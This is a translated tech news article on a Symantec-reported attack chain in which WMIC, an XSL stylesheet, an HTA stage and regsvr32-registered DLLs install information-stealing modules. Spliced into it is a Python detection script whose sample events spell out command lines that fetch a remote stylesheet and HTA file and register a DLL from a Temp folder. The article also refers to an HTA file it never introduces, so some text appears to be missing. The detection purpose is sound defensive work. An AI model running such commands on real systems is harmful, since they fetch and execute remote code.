Attackers increasingly use legitimate tools or run simple scripts and shellcode directly in memory. These living-off-the-land tactics are less likely to be detected by traditional malware protection, Symantec warns.
By carrying out an attack with software and processes that are already present on the targeted computer, an attacker can operate unnoticed for longer. Because (almost) no new, unknown files are introduced to the system, the risk of detection is minimized.
A new attack uncovered by Symantec uses the legitimate WMIC tool in Windows (Windows Management Instrumentation Command-line) in combination with an eXtensible Stylesheet Language (XSL) file to download malware onto a system and then steal information.
WMIC is a legitimate utility that is present on all Windows machines. It is used for management tasks on both local and remote systems and can retrieve system settings, control processes and execute scripts.
The use of WMI by cybercriminals is not new. The tool is usually used for propagation, but in this case it is used to download a malicious file, according to the Symantec researchers.
The HTA file then generates new dynamic URLs in a similar way to download more files, including three DLLs. These DLLs, along with the main payload, are registered using the legitimate regsvr32.exe.
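The chain described above (WMIC consuming an XSL stylesheet, an HTA stage, and DLLs registered through regsvr32.exe) leaves traces in ordinary process-creation telemetry. The following Python is an added example, not code from the article or from Symantec: it runs three simple detection rules over a handful of constructed process-creation events. The events, rule names, paths and host names are all invented for the example; the only real facts it relies on are that WMIC accepts a stylesheet via its `/format:` switch and that HTA files are run by mshta.exe.

```python
"""Flag process-creation events matching a WMIC/XSL -> HTA -> regsvr32 chain.

Added example. The sample events below are constructed, not real telemetry.
"""
import re

# Constructed sample events: each is one process-creation record.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic os get /format:"https://updates.example.invalid/style.xsl"'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta https://updates.example.invalid/stage2.hta"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32 /s "C:\Users\victim\AppData\Local\Temp\mod1.dll"'},
    # Benign activity that the rules must not flag:
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"wmic os get caption"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32 /s "C:\Program Files\Vendor\tool.dll"'},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
XSL_RE = re.compile(r"\.xsl\b", re.IGNORECASE)
HTA_RE = re.compile(r"\.hta\b", re.IGNORECASE)
# A quoted DLL path (may contain spaces) or an unquoted one (no spaces).
DLL_RE = re.compile(r'"([A-Za-z]:\\[^"]+?\.dll)"|([A-Za-z]:\\\S+?\.dll)', re.IGNORECASE)

# Directories where installer-owned DLLs normally live. A DLL registered from
# anywhere else (user profile, %TEMP%, ProgramData) deserves a closer look.
TRUSTED_DLL_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def basename(image):
    """Lower-cased file name of an image path, tolerating either slash style."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the list of rule names an event matches (empty list means benign)."""
    hits = []
    proc = basename(event["image"])
    cmd = event.get("cmdline", "")

    # Rule 1: WMIC pointed at a stylesheet, or at anything fetched over HTTP(S).
    if proc == "wmic.exe" and (XSL_RE.search(cmd) or URL_RE.search(cmd)):
        hits.append("wmic_xsl_stylesheet")

    # Rule 2: the HTA host launched with an .hta file or a remote URL.
    if proc == "mshta.exe" and (HTA_RE.search(cmd) or URL_RE.search(cmd)):
        hits.append("mshta_hta_execution")

    # Rule 3: regsvr32 registering a DLL from outside the trusted install dirs.
    if proc == "regsvr32.exe":
        for m in DLL_RE.finditer(cmd):
            dll = (m.group(1) or m.group(2)).lower()
            if not dll.startswith(TRUSTED_DLL_DIRS):
                hits.append("regsvr32_untrusted_dll")
                break
    return hits


def scan(events):
    """Run evaluate() over a list of events; returns [(index, hits)] for alerting events."""
    return [(i, h) for i, e in enumerate(events) if (h := evaluate(e))]


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i]['cmdline']}\n  -> {', '.join(hits)}")
```

The three rules are deliberately independent so that each stage of the chain produces its own alert; correlating them by host and time window (for example, a regsvr32 alert shortly after a WMIC stylesheet alert on the same machine) is what turns individually noisy signals into a high-confidence detection.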
The payload contains several modules for stealing information from the affected system. The HTA file can be used to install additional modules, including a password-stealing tool, a keylogger, a backdoor, and so on.
This news article was automatically translated from Dutch to give Techzine.eu a head start.